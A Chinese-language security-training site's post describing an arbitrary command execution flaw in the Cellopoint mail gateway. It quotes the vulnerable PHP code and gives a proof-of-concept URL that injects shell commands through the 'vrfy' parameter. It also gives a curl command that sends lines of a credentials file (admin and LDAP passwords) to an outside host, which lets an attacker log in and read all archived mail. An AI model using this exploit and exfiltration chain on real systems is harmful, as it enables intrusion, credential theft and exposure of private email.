• 中国湖北省武汉
  • 15527777548/18696195380
网盾网络安全培训学校
  • 网站首页
  • 课程中心
    • 网络安全培训
    • 渗透测试工程师培训
    • 网络安全工程师培训班
    • 网络运维培训
    • 网络安全工程师培训
    • 黑客技术专业培训
    • 网络运维培训班
    • 黑客技术培训
  • 学院介绍
    • 公司简介
    • 在线反馈
  • 新闻资讯
    • 学院资讯
    • 安全资讯
    • 行业新闻
    • 活动新闻
  • 招贤纳士
  • 联系我们
  • 网盾课堂
  • 网盾靶场
  • 网盾云平台

cellopoint 邮件网关任意命令执行漏洞

2018-01-19 14:12:42 315safe

使用

$file = (isset($_GET["file"]) ? $_GET["file"] : $ini_default);

$debugFile = "/tmp/vrfy-test.err";$cmd = $GLOBALS["TopFileRoot"] . "smtpd/celloauth -v " . . " -n $vrfy -d 2> debugFile";

exec($cmd, $output, $ret);

$lines = @file($debugFile); 

URL内构造POC:gw_x_vrfy_n_test.php?vrfy=;$cmd;

的方式可以利用该漏洞执行命令(nobody权限)。

排查发现/usr/local/mozart/smtpd/default.ini文件保存各项邮件管理员、ldap等账户密码信息。

构造以下sed命令(通过sed命令读取目标文件单行内容):

curl%20-k%20https://cloudeye.me/?info=$(sed%20-n%20§3§p%20/usr/local/mozart/smtpd/default.ini),

通过查阅远端服务器(例如cloudeye.me)的web日志信息,

回显获取到default.ini文件内容,得到邮件归档管理员admin的口令或者配置的ldap密码,访问 $ip/report/login.php 登陆查阅全部邮件内容。

 

  • 上一篇 :XMan冬令营正式开营!名企大咖火热开讲
  • 下一篇 :tenda某路由器信息泄露查找

为您推荐

  • 所有文章
  • 学院资讯
  • 安全资讯
  • 行业新闻
  • 活动新闻

课程中心

  • 网络安全培训
  • 渗透测试工程师培训
  • 网络安全工程师培训班
  • 网络运维培训
  • 网络安全工程师培训
  • 黑客技术专业培训
  • 网络运维培训班
  • 黑客技术培训

学院介绍

  • 公司简介
  • 在线反馈

新闻资讯

  • 学院资讯
  • 安全资讯
  • 行业新闻
  • 活动新闻
15527777548/18696195380

周一至周五 08:30~17:30

:3329043

网盾网络安全培训学校 版权所有 2020-2022 鄂ICP备2023003462号-8